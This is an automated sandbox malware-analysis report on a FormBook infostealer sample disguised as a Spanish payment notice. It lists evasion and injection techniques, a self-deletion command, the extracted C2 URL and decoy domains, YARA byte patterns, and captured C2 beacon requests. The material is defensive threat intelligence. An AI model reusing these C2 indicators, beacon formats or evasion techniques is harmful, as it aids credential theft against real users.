Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Notificaci#U00f3n de pago.exe

Overview

General Information

Sample Name:Notificaci#U00f3n de pago.exe
Analysis ID:626150
MD5:297e8b7f26a2eb1af366cac0202eca9a
SHA1:4b3e36dcd7ea9785f93e43699e1224ad30626148
SHA256:441ba10d2078c45be3d266523f77b59a1478f61ce09f2097ccc276d534c35855
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Notificaci#U00f3n de pago.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe" MD5: 297E8B7F26A2EB1AF366CAC0202ECA9A)
    • Notificaci#U00f3n de pago.exe (PID: 6968 cmdline: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe MD5: 297E8B7F26A2EB1AF366CAC0202ECA9A)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 6172 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 6596 cmdline: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hkqhdq.com/d6fp/"], "decoy": ["cwejman.art", "chandlerfeed.site", "team-ctctitleco.com", "yennyalfonsotorres84.com", "letseatdonuts.com", "runicarcanum.com", "info-center.xyz", "stemcanada.net", "granerde.com", "pixelatedkittys.com", "selfservicerepait.com", "lasvegastechman.com", "massage-rino.com", "bfederation.com", "kjy9.com", "homeiexpress.com", "hayatiorhan.com", "89739134.com", "kristin-feireiss-80.com", "zfp2.xyz", "peq2ulps.com", "redgreenbandits.com", "doblehuella.com", "521xiao.com", "freedomadventurescharters.com", "424259842.xyz", "peachfsg.com", "marketery.net", "dubhmor-dg.com", "sustainabilitymantra.xyz", "obivka.site", "yoursjoysled.com", "neurovirtualusa.com", "938323373.com", "seabornecap.com", "rjxingfu.com", "vacationsimplified.com", "elramony.com", "craftivitycrew.com", "cryptoheritageclub.com", "tcr8.fund", "gloumarc.com", "marry-me-today.com", "screator.life", "tokusou-clean.com", "sagesse.agency", "borilius.com", "www-saber.com", "bondjetfuel.com", "sedadbir.com", "interparking-60years.com", "mdartwork.com", "materialy.pro", "theguiriguide.com", "islandacoustical.com", "einfachmalgut.com", "nonstrappedmedia.club", "librevillegabon.com", "wasatchholidayclassic.net", "shanhaiyizhi.com", "triptoasiam.com", "s3industrail.com", "evertribute.com", "marketing-toolbox.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.0.Notificaci#U00f3n de pago.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.0.Notificaci#U00f3n de pago.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8192:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15535:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14fe1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15637:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x157af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x8baa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1425c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9922:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.0.Notificaci#U00f3n de pago.exe.400000.4.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hkqhdq.com/d6fp/"], "decoy": ["cwejman.art", "chandlerfeed.site", "team-ctctitleco.com", "yennyalfonsotorres84.com", "letseatdonuts.com", "runicarcanum.com", "info-center.xyz", "stemcanada.net", "granerde.com", "pixelatedkittys.com", "selfservicerepait.com", "lasvegastechman.com", "massage-rino.com", "bfederation.com", "kjy9.com", "homeiexpress.com", "hayatiorhan.com", "89739134.com", "kristin-feireiss-80.com", "zfp2.xyz", "peq2ulps.com", "redgreenbandits.com", "doblehuella.com", "521xiao.com", "freedomadventurescharters.com", "424259842.xyz", "peachfsg.com", "marketery.net", "dubhmor-dg.com", "sustainabilitymantra.xyz", "obivka.site", "yoursjoysled.com", "neurovirtualusa.com", "938323373.com", "seabornecap.com", "rjxingfu.com", "vacationsimplified.com", "elramony.com", "craftivitycrew.com", "cryptoheritageclub.com", "tcr8.fund", "gloumarc.com", "marry-me-today.com", "screator.life", "tokusou-clean.com", "sagesse.agency", "borilius.com", "www-saber.com", "bondjetfuel.com", "sedadbir.com", "interparking-60years.com", "mdartwork.com", "materialy.pro", "theguiriguide.com", "islandacoustical.com", "einfachmalgut.com", "nonstrappedmedia.club", "librevillegabon.com", "wasatchholidayclassic.net", "shanhaiyizhi.com", "triptoasiam.com", "s3industrail.com", "evertribute.com", "marketing-toolbox.com"]}
          Multi AV Scanner detection for submitted file
          Source: Notificaci#U00f3n de pago.exeVirustotal: Detection: 21%Perma Link
          Source: Notificaci#U00f3n de pago.exeReversingLabs: Detection: 41%
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: Notificaci#U00f3n de pago.exeJoe Sandbox ML: detected
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Notificaci#U00f3n de pago.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Notificaci#U00f3n de pago.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb8A source: Notificaci#U00f3n de pago.exe
          Source: Binary string: WWAHost.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb source: Notificaci#U00f3n de pago.exe
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 4x nop then pop edi8_2_004172F6
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 4x nop then pop edi8_2_00417FEB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi14_2_00A772F6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi14_2_00A77FEB

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 104.195.7.239 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.theguiriguide.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.librevillegabon.com
          Source: C:\Windows\explorer.exeDomain query: www.team-ctctitleco.com
          Source: C:\Windows\explorer.exeDomain query: www.evertribute.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.hkqhdq.com/d6fp/
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: global trafficHTTP traffic detected: GET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1Host: www.evertribute.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1Host: www.theguiriguide.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1Host: www.librevillegabon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.263896171.0000000005F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html0
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comB.TTF?m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comlvfetDm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como)m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comsief
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266049177.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnG
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cne-dio
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnnt
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/2
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/n
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Dm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Mm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
